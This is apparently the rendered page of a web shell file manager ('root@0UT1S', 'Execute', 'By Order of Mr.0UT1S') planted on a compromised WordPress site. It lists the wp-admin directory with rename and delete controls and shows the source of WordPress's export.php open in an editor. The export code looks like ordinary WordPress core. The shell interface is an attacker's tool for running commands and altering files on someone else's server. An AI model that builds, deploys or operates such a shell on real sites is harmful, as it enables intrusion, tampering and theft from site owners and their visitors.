home
/
aioutajg
/
unblockedgames247.com
/
wp-admin
/
Go to Home Directory
+
Upload
Create File
root@0UT1S:~$
Execute
By Order of Mr.0UT1S
[DIR] ..
N/A
[DIR] css
N/A
[DIR] images
N/A
[DIR] includes
N/A
[DIR] js
N/A
[DIR] maint
N/A
[DIR] network
N/A
[DIR] user
N/A
about.php
17.77 KB
Rename
Delete
admin-ajax.php
5.03 KB
Rename
Delete
admin-footer.php
2.77 KB
Rename
Delete
admin-functions.php
479 bytes
Rename
Delete
admin-header.php
9.12 KB
Rename
Delete
admin-post.php
1.97 KB
Rename
Delete
admin.php
12.30 KB
Rename
Delete
async-upload.php
4.87 KB
Rename
Delete
authorize-application.php
10.09 KB
Rename
Delete
comment.php
11.35 KB
Rename
Delete
contribute.php
5.59 KB
Rename
Delete
credits.php
4.11 KB
Rename
Delete
custom-background.php
489 bytes
Rename
Delete
custom-header.php
499 bytes
Rename
Delete
customize.php
10.91 KB
Rename
Delete
edit-comments.php
14.38 KB
Rename
Delete
edit-form-advanced.php
28.83 KB
Rename
Delete
edit-form-blocks.php
14.37 KB
Rename
Delete
edit-form-comment.php
8.34 KB
Rename
Delete
edit-link-form.php
6.21 KB
Rename
Delete
edit-tag-form.php
10.44 KB
Rename
Delete
edit-tags.php
22.00 KB
Rename
Delete
edit.php
19.48 KB
Rename
Delete
erase-personal-data.php
7.33 KB
Rename
Delete
error_log
2.13 KB
Rename
Delete
export-personal-data.php
7.75 KB
Rename
Delete
export.php
11.02 KB
Rename
Delete
freedoms.php
4.54 KB
Rename
Delete
import.php
7.58 KB
Rename
Delete
index.php
7.68 KB
Rename
Delete
install-helper.php
6.80 KB
Rename
Delete
install.php
17.94 KB
Rename
Delete
link-add.php
934 bytes
Rename
Delete
link-manager.php
4.26 KB
Rename
Delete
link-parse-opml.php
2.63 KB
Rename
Delete
link.php
2.89 KB
Rename
Delete
load-scripts.php
2.02 KB
Rename
Delete
load-styles.php
2.92 KB
Rename
Delete
media-new.php
3.18 KB
Rename
Delete
media-upload.php
3.58 KB
Rename
Delete
media.php
819 bytes
Rename
Delete
menu-header.php
9.82 KB
Rename
Delete
menu.php
16.97 KB
Rename
Delete
moderation.php
307 bytes
Rename
Delete
ms-admin.php
196 bytes
Rename
Delete
ms-delete-site.php
4.19 KB
Rename
Delete
ms-edit.php
216 bytes
Rename
Delete
ms-options.php
229 bytes
Rename
Delete
ms-sites.php
215 bytes
Rename
Delete
ms-themes.php
217 bytes
Rename
Delete
ms-upgrade-network.php
219 bytes
Rename
Delete
ms-users.php
215 bytes
Rename
Delete
my-sites.php
4.74 KB
Rename
Delete
nav-menus.php
48.26 KB
Rename
Delete
network.php
5.39 KB
Rename
Delete
options-discussion.php
15.40 KB
Rename
Delete
options-general.php
21.58 KB
Rename
Delete
options-head.php
621 bytes
Rename
Delete
options-media.php
6.35 KB
Rename
Delete
options-permalink.php
21.21 KB
Rename
Delete
options-privacy.php
9.95 KB
Rename
Delete
options-reading.php
10.03 KB
Rename
Delete
options-writing.php
9.10 KB
Rename
Delete
options.php
13.45 KB
Rename
Delete
plugin-editor.php
13.66 KB
Rename
Delete
plugin-install.php
6.96 KB
Rename
Delete
plugins.php
30.00 KB
Rename
Delete
post-new.php
2.70 KB
Rename
Delete
post.php
9.97 KB
Rename
Delete
press-this.php
2.34 KB
Rename
Delete
privacy-policy-guide.php
3.67 KB
Rename
Delete
privacy.php
2.52 KB
Rename
Delete
profile.php
283 bytes
Rename
Delete
revision.php
5.71 KB
Rename
Delete
setup-config.php
17.48 KB
Rename
Delete
site-editor.php
11.83 KB
Rename
Delete
site-health-info.php
3.99 KB
Rename
Delete
site-health.php
10.20 KB
Rename
Delete
term.php
2.20 KB
Rename
Delete
theme-editor.php
15.59 KB
Rename
Delete
theme-install.php
23.37 KB
Rename
Delete
themes.php
48.12 KB
Rename
Delete
tools.php
3.43 KB
Rename
Delete
update-core.php
45.43 KB
Rename
Delete
update.php
12.79 KB
Rename
Delete
upgrade-functions.php
341 bytes
Rename
Delete
upgrade.php
6.33 KB
Rename
Delete
upload.php
14.84 KB
Rename
Delete
user-edit.php
39.79 KB
Rename
Delete
user-new.php
24.05 KB
Rename
Delete
users.php
23.28 KB
Rename
Delete
widgets-form-blocks.php
4.97 KB
Rename
Delete
widgets-form.php
19.17 KB
Rename
Delete
widgets.php
1.09 KB
Rename
Delete
<?php /** * WordPress Export Administration Screen * * @package WordPress * @subpackage Administration */ /** Load WordPress Bootstrap */ require_once __DIR__ . '/admin.php'; if ( ! current_user_can( 'export' ) ) { wp_die( __( 'Sorry, you are not allowed to export the content of this site.' ) ); } /** Load WordPress export API */ require_once ABSPATH . 'wp-admin/includes/export.php'; // Used in the HTML title tag. $title = __( 'Export' ); /** * Display JavaScript on the page. * * @since 3.5.0 */ function export_add_js() { ?> <script type="text/javascript"> jQuery( function($) { var form = $('#export-filters'), filters = form.find('.export-filters'); filters.hide(); form.find('input:radio').on( 'change', function() { filters.slideUp('fast'); switch ( $(this).val() ) { case 'attachment': $('#attachment-filters').slideDown(); break; case 'posts': $('#post-filters').slideDown(); break; case 'pages': $('#page-filters').slideDown(); break; } }); } ); </script> <?php } add_action( 'admin_head', 'export_add_js' ); get_current_screen()->add_help_tab( array( 'id' => 'overview', 'title' => __( 'Overview' ), 'content' => '<p>' . __( 'You can export a file of your site’s content in order to import it into another installation or platform. The export file will be an XML file format called WXR. Posts, pages, comments, custom fields, categories, and tags can be included. You can choose for the WXR file to include only certain posts or pages by setting the dropdown filters to limit the export by category, author, date range by month, or publishing status.' ) . '</p>' . '<p>' . __( 'Once generated, your WXR file can be imported by another WordPress site or by another blogging platform able to access this format.' ) . '</p>', ) ); get_current_screen()->set_help_sidebar( '<p><strong>' . __( 'For more information:' ) . '</strong></p>' . '<p>' . __( '<a href="https://wordpress.org/documentation/article/tools-export-screen/">Documentation on Export</a>' ) . '</p>' . '<p>' . __( '<a href="https://wordpress.org/support/forums/">Support forums</a>' ) . '</p>' ); // If the 'download' URL parameter is set, a WXR export file is baked and returned. if ( isset( $_GET['download'] ) ) { $args = array(); if ( ! isset( $_GET['content'] ) || 'all' === $_GET['content'] ) { $args['content'] = 'all'; } elseif ( 'posts' === $_GET['content'] ) { $args['content'] = 'post'; if ( $_GET['cat'] ) { $args['category'] = (int) $_GET['cat']; } if ( $_GET['post_author'] ) { $args['author'] = (int) $_GET['post_author']; } if ( $_GET['post_start_date'] || $_GET['post_end_date'] ) { $args['start_date'] = $_GET['post_start_date']; $args['end_date'] = $_GET['post_end_date']; } if ( $_GET['post_status'] ) { $args['status'] = $_GET['post_status']; } } elseif ( 'pages' === $_GET['content'] ) { $args['content'] = 'page'; if ( $_GET['page_author'] ) { $args['author'] = (int) $_GET['page_author']; } if ( $_GET['page_start_date'] || $_GET['page_end_date'] ) { $args['start_date'] = $_GET['page_start_date']; $args['end_date'] = $_GET['page_end_date']; } if ( $_GET['page_status'] ) { $args['status'] = $_GET['page_status']; } } elseif ( 'attachment' === $_GET['content'] ) { $args['content'] = 'attachment'; if ( $_GET['attachment_start_date'] || $_GET['attachment_end_date'] ) { $args['start_date'] = $_GET['attachment_start_date']; $args['end_date'] = $_GET['attachment_end_date']; } } else { $args['content'] = $_GET['content']; } /** * Filters the export args. * * @since 3.5.0 * * @param array $args The arguments to send to the exporter. */ $args = apply_filters( 'export_args', $args ); export_wp( $args ); die(); } require_once ABSPATH . 'wp-admin/admin-header.php'; /** * Creates the date options fields for exporting a given post type. * * @since 3.1.0 * * @global wpdb $wpdb WordPress database abstraction object. * @global WP_Locale $wp_locale WordPress date and time locale object. * * @param string $post_type The post type. Default 'post'. */ function export_date_options( $post_type = 'post' ) { global $wpdb, $wp_locale; $months = $wpdb->get_results( $wpdb->prepare( "SELECT DISTINCT YEAR( post_date ) AS year, MONTH( post_date ) AS month FROM $wpdb->posts WHERE post_type = %s AND post_status != 'auto-draft' ORDER BY post_date DESC", $post_type ) ); $month_count = count( $months ); if ( ! $month_count || ( 1 === $month_count && 0 === (int) $months[0]->month ) ) { return; } foreach ( $months as $date ) { if ( 0 === (int) $date->year ) { continue; } $month = zeroise( $date->month, 2 ); printf( '<option value="%1$s">%2$s</option>', esc_attr( $date->year . '-' . $month ), $wp_locale->get_month( $month ) . ' ' . $date->year ); } } ?> <div class="wrap"> <h1><?php echo esc_html( $title ); ?></h1> <p><?php _e( 'When you click the button below WordPress will create an XML file for you to save to your computer.' ); ?></p> <p><?php _e( 'This format, which is called WordPress eXtended RSS or WXR, will contain your posts, pages, comments, custom fields, categories, and tags.' ); ?></p> <p><?php _e( 'Once you’ve saved the download file, you can use the Import function in another WordPress installation to import the content from this site.' ); ?></p> <h2><?php _e( 'Choose what to export' ); ?></h2> <form method="get" id="export-filters"> <fieldset> <legend class="screen-reader-text"> <?php /* translators: Hidden accessibility text. */ _e( 'Content to export' ); ?> </legend> <input type="hidden" name="download" value="true" /> <p><label><input type="radio" name="content" value="all" checked="checked" aria-describedby="all-content-desc" /> <?php _e( 'All content' ); ?></label></p> <p class="description" id="all-content-desc"><?php _e( 'This will contain all of your posts, pages, comments, custom fields, terms, navigation menus, and custom posts.' ); ?></p> <p><label><input type="radio" name="content" value="posts" /> <?php _ex( 'Posts', 'post type general name' ); ?></label></p> <ul id="post-filters" class="export-filters"> <li> <label><span class="label-responsive"><?php _e( 'Categories:' ); ?></span> <?php wp_dropdown_categories( array( 'show_option_all' => __( 'All' ) ) ); ?> </label> </li> <li> <label><span class="label-responsive"><?php _e( 'Authors:' ); ?></span> <?php $authors = $wpdb->get_col( "SELECT DISTINCT post_author FROM {$wpdb->posts} WHERE post_type = 'post'" ); wp_dropdown_users( array( 'include' => $authors, 'name' => 'post_author', 'multi' => true, 'show_option_all' => __( 'All' ), 'show' => 'display_name_with_login', ) ); ?> </label> </li> <li> <fieldset> <legend class="screen-reader-text"> <?php /* translators: Hidden accessibility text. */ _e( 'Date range:' ) ?> </legend> <label for="post-start-date" class="label-responsive"><?php _e( 'Start date:' ); ?></label> <select name="post_start_date" id="post-start-date"> <option value="0"><?php _e( '— Select —' ); ?></option> <?php export_date_options(); ?> </select> <label for="post-end-date" class="label-responsive"><?php _e( 'End date:' ); ?></label> <select name="post_end_date" id="post-end-date"> <option value="0"><?php _e( '— Select —' ); ?></option> <?php export_date_options(); ?> </select> </fieldset> </li> <li> <label for="post-status" class="label-responsive"><?php _e( 'Status:' ); ?></label> <select name="post_status" id="post-status"> <option value="0"><?php _e( 'All' ); ?></option> <?php $post_statuses = get_post_stati( array( 'internal' => false ), 'objects' ); foreach ( $post_statuses as $status ) : ?> <option value="<?php echo esc_attr( $status->name ); ?>"><?php echo esc_html( $status->label ); ?></option> <?php endforeach; ?> </select> </li> </ul> <p><label><input type="radio" name="content" value="pages" /> <?php _e( 'Pages' ); ?></label></p> <ul id="page-filters" class="export-filters"> <li> <label><span class="label-responsive"><?php _e( 'Authors:' ); ?></span> <?php $authors = $wpdb->get_col( "SELECT DISTINCT post_author FROM {$wpdb->posts} WHERE post_type = 'page'" ); wp_dropdown_users( array( 'include' => $authors, 'name' => 'page_author', 'multi' => true, 'show_option_all' => __( 'All' ), 'show' => 'display_name_with_login', ) ); ?> </label> </li> <li> <fieldset> <legend class="screen-reader-text"> <?php /* translators: Hidden accessibility text. */ _e( 'Date range:' ); ?> </legend> <label for="page-start-date" class="label-responsive"><?php _e( 'Start date:' ); ?></label> <select name="page_start_date" id="page-start-date"> <option value="0"><?php _e( '— Select —' ); ?></option> <?php export_date_options( 'page' ); ?> </select> <label for="page-end-date" class="label-responsive"><?php _e( 'End date:' ); ?></label> <select name="page_end_date" id="page-end-date"> <option value="0"><?php _e( '— Select —' ); ?></option> <?php export_date_options( 'page' ); ?> </select> </fieldset> </li> <li> <label for="page-status" class="label-responsive"><?php _e( 'Status:' ); ?></label> <select name="page_status" id="page-status"> <option value="0"><?php _e( 'All' ); ?></option> <?php foreach ( $post_statuses as $status ) : ?> <option value="<?php echo esc_attr( $status->name ); ?>"><?php echo esc_html( $status->label ); ?></option> <?php endforeach; ?> </select> </li> </ul> <?php foreach ( get_post_types( array( '_builtin' => false, 'can_export' => true, ), 'objects' ) as $post_type ) : ?> <p><label><input type="radio" name="content" value="<?php echo esc_attr( $post_type->name ); ?>" /> <?php echo esc_html( $post_type->label ); ?></label></p> <?php endforeach; ?> <p><label><input type="radio" name="content" value="attachment" /> <?php _e( 'Media' ); ?></label></p> <ul id="attachment-filters" class="export-filters"> <li> <fieldset> <legend class="screen-reader-text"> <?php /* translators: Hidden accessibility text. */ _e( 'Date range:' ); ?> </legend> <label for="attachment-start-date" class="label-responsive"><?php _e( 'Start date:' ); ?></label> <select name="attachment_start_date" id="attachment-start-date"> <option value="0"><?php _e( '— Select —' ); ?></option> <?php export_date_options( 'attachment' ); ?> </select> <label for="attachment-end-date" class="label-responsive"><?php _e( 'End date:' ); ?></label> <select name="attachment_end_date" id="attachment-end-date"> <option value="0"><?php _e( '— Select —' ); ?></option> <?php export_date_options( 'attachment' ); ?> </select> </fieldset> </li> </ul> </fieldset> <?php /** * Fires at the end of the export filters form. * * @since 3.5.0 */ do_action( 'export_filters' ); ?> <?php submit_button( __( 'Download Export File' ) ); ?> </form> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php'; ?>
Save